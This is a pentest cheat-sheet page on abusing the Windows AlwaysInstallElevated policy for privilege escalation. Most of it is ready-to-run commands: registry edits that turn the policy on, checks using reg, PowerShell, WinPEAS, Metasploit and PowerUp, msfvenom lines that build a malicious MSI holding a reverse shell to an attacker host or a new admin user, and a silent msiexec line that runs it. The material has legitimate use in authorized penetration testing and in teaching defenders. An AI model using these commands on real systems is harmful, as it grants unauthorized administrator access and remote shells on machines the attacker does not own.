Skip to main content

AlwaysInstallElevated

Windows Installer Files [.msi] are used to Install Applications on the System. They Usually run with the Privilege Level of the User that Start them.

However, they can be Configured to run with Higher Privileges from any User Account (Even Unprivileged Ones). We can Potentially generate a Malicious [.msi] File that would run with Admin Privileges.


Setting the Values

Required Privileges: Administrators

If the Values are already set the User doesn't require Administrative Privileges.

:: Set AlwaysInstallElevated
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1
reg add HKEY_USERS\(USER_SID)\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1

:: Set AlwaysInstallElevated for a Specific User
:: Requires User SID
:: The User SID can be Found with [whoami /all]
reg add HKEY_USERS\<USER_SID>\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1

Finding the Values

Both Values Should be Set to [0x1]. Otherwise the Exploitation will Not be Possible.
:: Find the Values using [WinPeas]
winpeas quiet systeminfo

:: Find the Values using [Metasploit]
exploit/windows/local/always_install_elevated
:: [CMD] Find the Values using [reg]
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# [PSH] Find the Values using [Get-ItemProperty]
Get-ItemProperty HKLM\Software\Policies\Microsoft\Windows\Installer
Get-ItemProperty HKCU\Software\Policies\Microsoft\Windows\Installer

# Find the Values using [PowerUp]
Get-RegistryAlwaysInstallElevated
Write-UserAddMSI

Creating - Running the Malicious [MSI]

:: PAYLOADS
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f msi -o Malicious.msi
msfvenom -p windows/adduser USER=username PASS=password -f msi -o Malicious.msi

:: Run the MSI
msiexec /quiet /qn /i C:\Payload\Path\Malicious.msi